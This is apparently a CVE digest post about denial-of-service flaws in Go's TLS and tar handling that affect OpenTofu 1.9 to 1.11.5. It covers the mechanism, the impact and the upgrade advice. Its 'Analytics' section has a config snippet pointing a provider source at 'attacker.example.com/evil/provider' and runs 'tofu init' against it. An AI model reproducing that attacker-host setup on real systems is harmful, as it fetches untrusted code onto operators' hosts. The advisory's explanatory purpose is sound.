Listen to this Post
How the mentioned CVEs work: OpenTofu relies on Go’s standard library for TLS certificate verification (crypto/x509, crypto/tls) and tar archive extraction (archive/tar). CVE-2026-32280 causes unexpected work during chain building, leading to high CPU. CVE-2026-32281 triggers inefficient policy validation, amplifying CPU usage. CVE-2026-32283 allows an unauthenticated TLS 1.3 KeyUpdate record to keep connections persistent, causing memory exhaustion and deadlock. CVE-2026-32288 performs unbounded allocation when processing old GNU sparse headers in tar archives. An attacker controls a malicious HTTPS server or a crafted tar archive, then coerces an operator to run “tofu init” against that source. During dependency installation, before any checksum verification, OpenTofu processes the malicious TLS chain or archive. The Go implementations then consume unbounded memory, spike CPU, or hang indefinitely. This denies service for tofu init and may degrade or crash other processes on the same host. The vulnerabilities are unauthenticated—no credentials needed—and do not allow code execution or information disclosure. Affected versions: OpenTofu 1.9.x, 1.10.x, and 1.11.x before 1.11.6.
dailycve form:
Platform: OpenTofu
Version: 1.9-1.11.5
Vulnerability: DoS via TLS/tar
Severity: Medium
date: 2026-04-14
Prediction: Patch released 2026-03
Analytics under What Undercode Say:
Check OpenTofu version
tofu version
Simulate vulnerable module init (attacker-controlled source)
cat > main.tf <<EOF
terraform {
required_providers {
malicious = {
source = "attacker.example.com/evil/provider"
}
}
}
EOF
tofu init -upgrade
Monitor memory/CPU during init
while true; do ps aux | grep tofu | grep -v grep; sleep 1; done
Use Go tool to analyze TLS chain building (CVE-2026-32280)
go run -exec 'strace -f' verify_chain.go
Exploit:
Attacker sets up HTTPS server with maliciously-crafted TLS certificate chain (nested cross-signed certificates causing exponential path building) or sends TLS 1.3 KeyUpdate records repeatedly. For tar, attacker serves archive containing GNU sparse headers with huge declared size. Operator adds dependency source to OpenTofu config and runs tofu init. OpenTofu’s Go standard library processes the malicious input, leading to unbounded CPU/memory or deadlock before any signature verification.
Protection from this CVE:
Upgrade to OpenTofu v1.11.6 (built with Go 1.25.9). For v1.9/v1.10, manually review all module and provider sources before adding to config. Fetch artifacts using external tools (curl, wget) and verify checksums offline. Use network firewalls to block connections to untrusted HTTPS servers. Avoid using third-party modules that proxy to attacker-controlled sources. Monitor system resources during tofu init.
Impact:
Unauthenticated denial of service. `tofu init` fails to complete, blocking infrastructure provisioning. Unbounded memory may exhaust RAM, causing OOM kills or swapping. High CPU degrades other processes on same host. Deadlock makes `tofu init` hang indefinitely. No arbitrary code execution, no data leak. Attack requires user coercion to add attacker-controlled dependency source.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

